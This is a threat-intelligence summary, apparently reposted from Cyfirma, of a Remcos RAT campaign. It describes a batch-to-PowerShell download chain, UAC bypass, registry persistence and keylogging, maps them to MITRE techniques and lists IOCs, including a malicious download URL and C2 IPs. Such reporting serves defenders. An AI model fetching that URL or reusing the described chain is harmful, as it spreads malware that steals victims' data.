Threat Research

The Persistent Danger of Remcos RAT – CYFIRMA

Securonix

Cyfirma analyzes a persistent Remcos RAT campaign driven by a broad infrastructure of malicious IPs and multi-stage payloads, delivering and controlling Remcos across compromised hosts. The report details how the attackers use PowerShell-enabled scripts, registry-based persistence, UAC bypass, keylogging, audio capture, and screen recording to exfiltrate data and maintain control, with activity tied to gaming-related targets. #RemcosRAT #NewRem #RiotGames #Cyfirma

Keypoints

  • Remcos RAT campaigns are hosted on multiple malicious IPs, with 141.95.16.111:8080 highlighted as a primary delivery point for payloads like recover.bat and RiotGames.exe.
  • The recover.bat script uses PowerShell to download the second-stage payload (RiotGames.exe) from a remote location, enabling a multistage infection chain.
  • RiotGames.exe modifies the registry to disable UAC and uses auto-run registry keys to establish persistence.
  • Extracted configuration data reveals C2 IP (141.95.16.111:2404), botnet name (NewRem), and mutex/name directories, guiding activities from keylogging to screenshot capture.
  • Capabilities include keylogging, audio recording, desktop screenshot capture, and potential data exfiltration, raising privacy and credential theft concerns.
  • There is low-to-moderate confidence that the campaign targets gaming-related individuals, based on file names and referenced utilities masquerading as gaming-related tools.
  • The infrastructure is dynamic: threat actors frequently shift IPs/servers, host multiple malicious files, and use decoy/abused utilities to evade detection and persist over time.

MITRE Techniques

  • [T1566] Phishing – Initial access via malicious attachments, drive-by downloads, or social engineering tactics. “Remcos RAT is typically spread through malicious attachments, drive-by downloads, or social engineering tactics.”
  • [T1204.002] Malicious File – The campaign delivers and executes malicious payloads such as recover.bat and RiotGames.exe. “The ‘recover.bat’ script, executed upon infection, harnesses PowerShell to download the second-stage payload (‘RiotGames.exe’) from a remote location.”
  • [T1059.001] PowerShell – Execution via PowerShell to fetch and run the second-stage payload. “PowerShell to download the second-stage payload (‘RiotGames.exe’)”
  • [T1547.001] Registry Run Keys – Persistence via auto-run registry keys. “persistence by utilizing auto-run registry keys.”
  • [T1112] Modify Registry – Modifying registry entries to affect system behavior. “The RiotGames.exe binary modifies the registry to disable User Account Control (UAC).”
  • [T1548.002] Bypass User Account Control – Bypassing UAC prompts to operate with fewer restrictions. “Bypass UAC”
  • [T1083] File and Directory Discovery – Discovery of configuration data including C2 IP, botnet name, filenames, directories. “Extracted configuration data unveils critical details, including the C2 IP, botnet name, filenames, directories, and mutex name.”
  • [T1082] System Information Discovery – Inferring system details as part of reconnaissance. “botnet name (NewRem), filenames, directories, and mutex name” implies system/context awareness.
  • [T1113] Screen Capture – Taking desktop screenshots for monitoring. “screen capture”
  • [T1123] Audio Capture – Recording audio from the victim’s device. “audio recording capabilities”
  • [T1115] Clipboard Data – Accessing clipboard contents for sensitive data. “Clipboard data”
  • [T1056.001] Input Capture: Keylogging – Logging keystrokes for credential theft. “Keylogging”
  • [T1041] Exfiltration Over C2 Channel – Potential data exfiltration over the C2 channel. “data can be exfiltrated”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communications over HTTP/Web protocols. “Application Layer Protocol: Web protocols”

Indicators of Compromise

  • [MD5 File Hash] recover.bat – 4388789C81AFD593C5FC2F0249502153
  • [MD5 File Hash] RiotGames.exe – 5379d703170770355efdbce86dcdb1d3
  • [MD5 File Hash] newpy.exe – b28167faf2bcf0150d5e816346abb42d
  • [MD5 File Hash] echo-4662-2DF5.exe – 25fca21c810a8ffabf4fdf3b1755c73c
  • [MD5 File Hash] 123.exe – 791545E6E3C5EB61DD12CCFBAE1B9982
  • [IP] 141.95.16.111 – C2
  • [IP] 145.95.16.111 – C2
  • [URL] http geoplugin.net/json.gp – Geo-location service
  • [URL] http://141.95.16.111:8080/RiotGames.exe – Download location

Read more: https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint